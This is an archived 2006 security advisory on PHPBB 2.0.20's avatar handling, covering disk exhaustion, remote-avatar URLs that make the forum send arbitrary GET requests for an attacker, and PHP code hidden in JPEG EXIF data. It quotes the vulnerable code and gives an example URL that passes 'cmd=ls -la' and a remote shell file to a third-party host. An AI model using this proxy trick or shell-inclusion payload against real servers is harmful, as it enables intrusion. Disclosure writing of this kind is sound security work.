what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpbb2020multi.txt

phpbb2020multi.txt
Posted May 21, 2006
Authored by rgod | Site retrogod.altervista.org

PHPBB 2.0.20 suffers from multiple security related issues having to do with avatars.

tags | advisory
SHA-256 | 3a97bfd0a4a9d6f1703696b299aed47987f9649a25961d353c6c2c571c710bbf

phpbb2020multi.txt

Change Mirror Download
PHPBB 2.0.20 multiple issues with avatars

some problems persistently lie in the way it handles remote and uploaded avatars:

a remote user can:

(1) saturate the server with unuseful files, 'cause phpbb do not delete
the previous one when you upload a new avatar

(2) use PhpBB installations to launch exploits against other servers,
using "avatarurl" argument when you modify your profile as path
of a GET request.

Look usercp_avatar.php near lines 125-153:
...
if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )
{
if ( empty($url_ary[4]) )
{
$error = true;
$error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];
return;
}

$base_get = '/' . $url_ary[4];
$port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;

if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )
{
$error = true;
$error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL'];
return;
}

@fputs($fsock, "GET $base_get HTTP/1.1\r\n");
@fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");

unset($avatar_data);
while( !@feof($fsock) )
{
$avatar_data .= @fread($fsock, $board_config['avatar_filesize']);
}
@fclose($fsock);
...

phpbb do not check if the user supplied value ends with an image extension, neither
checks if the supplied string contains "&" and "?" chars. So, you can submit a value
like this:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt

phpbb will launch a GET request like this:

GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0
HOST: some_vulnerable.host
Connection: close

obviously you have no output, but this makes phpbb to be like a http proxy

(3) inject some php code inside jpeg files as EXIF metadata content:
this, in combinations with third party vulnerable code can be used
to compromise the server where PHP is installed.
Should be enough to check for php code inside the temporary files
before to copy the new avatar in "images/avatars/" folder.

rgod
---------------------------------------------------------------------------------
mail: rgod [at] autistici [dot] org
site: http://retrogod.altervista.org
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close